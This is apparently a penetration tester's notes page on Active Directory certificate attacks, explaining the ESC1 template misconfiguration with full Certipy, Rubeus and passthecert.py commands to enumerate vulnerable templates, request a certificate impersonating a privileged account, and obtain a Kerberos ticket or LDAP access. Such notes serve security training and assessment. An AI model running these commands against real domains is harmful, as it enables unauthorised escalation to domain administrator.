Certificates in AD

Read the Certified Pre-Owned white-paper to understand certificates and their attack vectors

Certipy

Certipy is incomptible with Python 3.11 and greater atm. A quick solution is found here

To enumerate AD for vulnerable certifications, we can utilize this command:

sudo certipy-ad find -u 'user@domain' -dc-ip <dc-ip> -vulnerable -enabled

Certipy outputs the configuration details of interest in JSON and TXT files following the naming convention "<DATE-TIMESTAMP>_Certipy"

ESC1

A certificate template with the ESC1 vulnerability allows low-privileged users to enroll and request a certificate for any domain object specified by the user. This means that any user with enrollment rights can request a certificate for a privileged account, such as a domain administrator.

Vulnerable templates have the following configurations:

  • Client Authentication: True

  • Enabled: True

  • Enrollee Supplies Subject: True

  • Requires Management Approval: False

  • Authorized Signatures Required: 0

The Certipy command required to request a certificate includes the following arguments:

-u : username
-p : compromised user password
-dc-ip : domain controller IP address 
-target : target CA (Certificate Authority) DNS (Domain Name System) Name 
-ca : short CA Name 
-template : vulnerable template name 
-upn : target user/object name

The full Certipy command is shown below:

sudo certipy-ad req -u 'user@domain' \
-dc-ip '<dc-ip>' \
-target 'foobar-CA.foobar.com' \
-ca 'foobar-CA' \
-template 'FOO_Templ' \
-upn 'target_user@damin'

If everything goes well you'll get a certificate <target_user>.pfx which can then be used to request a TGT.

With Rubeus:

Rubeus.exe asktgt /user:<target_user> /certificate:<path_to_cert>.pfx /domain:<domain> /dc:<domain-controller>

With Certipy:

sudo certipy-ad auth -pfx '<path_to_cert>.pfx' -username '<target_user>' -domain '<domain>' -dc-ip '<dc-ip>'

Note that if you get the error "KDC_ERR_PADATA_TYPE_NOSUPP" - PKINIT is not available. You can then instead try to connect with LDAP directly.

If you use Certipy to retrieve certificates, you can extract key and cert from the pfx by using:

certipy-ad cert -pfx user.pfx -nokey -out user.crt
certipy-ad cert -pfx user.pfx -nocert -out user.key

Then we can use passTheCert.py to perform different LDAP operations.

sudo python3 passthecert.py -action whoami -crt user.cert -key user.key -domain <domain> -dc-ip <dc-ip>

Last updated